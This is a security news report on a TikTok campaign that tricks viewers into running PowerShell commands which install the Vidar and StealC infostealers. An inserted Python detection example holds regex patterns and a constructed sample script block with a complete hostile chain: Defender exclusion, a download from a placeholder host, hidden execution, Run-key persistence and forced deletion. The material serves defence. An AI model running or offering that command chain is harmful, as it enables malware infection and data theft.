Hackers Exploit Trending TikTok Videos to Spread Vidar and StealC Malware

A sophisticated social engineering campaign uncovered by Trend Research is leveraging the viral reach of TikTok to distribute the Vidar and StealC information-stealing malware families.

By embedding step-by-step PowerShell execution instructions within trending, possibly AI-generated TikTok videos, attackers have managed to orchestrate a highly scalable and evasive attack targeting both individuals and organizations.

Technical Analysis of the Attack Vector

Unlike traditional phishing or fake CAPTCHA lures, this campaign eschews malicious HTML or JavaScript in favor of content-native, video-based social engineering.

Figure: widespread exposure and potential impact of the campaign

Threat actors create faceless TikTok accounts (many now deactivated), such as @gitallowed and @zane.houghton, that push videos purporting to offer software activation tricks for Windows, Office, CapCut, and Spotify.

The instructional content, often voiced using synthesized AI tools, directs viewers through a simple sequence: press Windows+R, launch PowerShell, and execute a provided command that covertly downloads and launches a malicious payload via a remote script.

One viral video from this set amassed nearly 500,000 views, highlighting the tremendous exposure potential of algorithm-driven social media platforms.

According to the Trend Micro report, these videos are designed for mass appeal, with minimal on-screen complexity and a presentation style closely mimicking legitimate technical tutorials.

The attackers’ use of PowerShell as a social engineering mechanism, rather than simply a post-exploitation tool, marks a notable shift in the threat landscape. It presents challenges for security solutions that typically scan for malicious code or suspicious URLs rather than for abuse of legitimate system utilities by the users themselves.

Malicious Execution Chain

When a victim follows the attacker’s instructions, the PowerShell script proceeds to:

  • Create concealed directories in APPDATA and LOCALAPPDATA.
  • Add these directories to the Windows Defender exclusion list for stealth.
  • Download a secondary payload (Vidar or StealC) from a hardcoded URL and execute it as a hidden, elevated process.
  • Retrieve an additional PowerShell script, establish persistence via registry modification, and erase temporary folders to thwart forensic investigation.
Figure: malicious PowerShell script
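The chain above is made of individually legitimate PowerShell operations, so a useful detection keys on their co-occurrence within one script block rather than on any single command. The following Python is an added example, not code from the article or from Trend Micro, that scores constructed script-block records (in the style of Windows PowerShell Event ID 4104 text) against the behaviours listed above; the behaviour names, the sample records, the placeholder URL and the threshold of two behaviours are assumptions.

```python
import re
from typing import Dict, List, Tuple

# Each behaviour from the described chain is a set of patterns that must ALL
# appear in the same script block (case-insensitive). Order in the dict fixes
# the order of names returned by classify().
BEHAVIOURS: Dict[str, List[str]] = {
    "defender_exclusion": [r"Add-MpPreference", r"-ExclusionPath"],
    "hidden_appdata_dir": [r"\$env:(?:LOCAL)?APPDATA|%(?:LOCAL)?APPDATA%",
                           r"New-Item|mkdir|Attributes.*Hidden"],
    "download_exec": [r"Invoke-WebRequest|Invoke-RestMethod|\biwr\b|\birm\b|DownloadString|DownloadFile",
                      r"Start-Process|Invoke-Expression|\biex\b|-WindowStyle\s+Hidden"],
    "run_key_persistence": [r"(?:Set|New)-ItemProperty", r"CurrentVersion\\Run"],
    "temp_cleanup": [r"Remove-Item", r"\$env:TEMP|%TEMP%", r"-Recurse|-Force"],
}

def classify(script_block: str) -> List[str]:
    """Names of chain behaviours whose patterns all match the script block."""
    return [name for name, pats in BEHAVIOURS.items()
            if all(re.search(p, script_block, re.I) for p in pats)]

def is_suspicious(script_block: str, threshold: int = 2) -> bool:
    """A lone behaviour (e.g. one Defender exclusion for a build folder) is
    routine admin work; the combination is what characterises this chain."""
    return len(classify(script_block)) >= threshold

def triage(events: List[Dict], threshold: int = 2) -> List[Tuple[int, List[str]]]:
    """(event id, matched behaviours) for every script block over the threshold."""
    return [(ev["id"], classify(ev["text"])) for ev in events
            if is_suspicious(ev["text"], threshold)]

# Constructed sample records, not real telemetry. Record 3 mirrors the
# described chain with a placeholder download source.
SAMPLE_EVENTS: List[Dict] = [
    {"id": 1, "text": 'Add-MpPreference -ExclusionPath "C:\\Dev\\build"'},
    {"id": 2, "text": 'Invoke-WebRequest -Uri "https://example.invalid/tool.zip" -OutFile "$env:TEMP\\tool.zip"'},
    {"id": 3, "text": (
        'New-Item -ItemType Directory -Path "$env:LOCALAPPDATA\\svc" -Force; '
        'Add-MpPreference -ExclusionPath "$env:LOCALAPPDATA\\svc"; '
        'Invoke-WebRequest -Uri "https://placeholder.invalid/file.exe" -OutFile "$env:LOCALAPPDATA\\svc\\f.exe"; '
        'Start-Process "$env:LOCALAPPDATA\\svc\\f.exe" -WindowStyle Hidden; '
        'Set-ItemProperty -Path "HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" -Name svc -Value "$env:LOCALAPPDATA\\svc\\f.exe"; '
        'Remove-Item "$env:TEMP\\stage" -Recurse -Force')},
]

if __name__ == "__main__":
    for event_id, found in triage(SAMPLE_EVENTS):
        print(f"event {event_id}: {len(found)} chain behaviours -> {found}")
```

Only record 3 is flagged; records 1 and 2 each show at most one behaviour and stay below the threshold, which keeps ordinary exclusions and plain downloads out of the alert queue.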

Notably, the malware abuses trusted third-party services, including Steam and Telegram, for command-and-control (C&C) communication.

Vidar, for example, leverages “Dead Drop Resolvers” by hiding active C&C IPs in Steam profile fields, allowing dynamic updates without direct infrastructure exposure.

The campaign reflects a new paradigm in malware delivery: social media platforms now serve as the primary infection vector rather than ancillary distribution channels.

Attackers exploit the high-trust, low-friction environment of viral content to deploy complex malware at scale. For defenders, this renders many legacy detection technologies less effective.

A robust response requires augmenting technical controls with behavioral analysis, monitoring for atypical PowerShell or system utility use, and actively tracking emerging threats on social media.

Organizations should bolster user education, focusing on skepticism towards unsolicited “how-to” content, especially content involving administrative commands or downloads.

Organizations are urged to proactively hunt for these IOCs in their environments and reinforce user training to minimize the risk of compromise from continuously evolving, socially engineered malware campaigns.


Mandvi
Mandvi is a Security Reporter covering data breaches, malware, cyberattacks, data leaks, and more at Cyber Press.
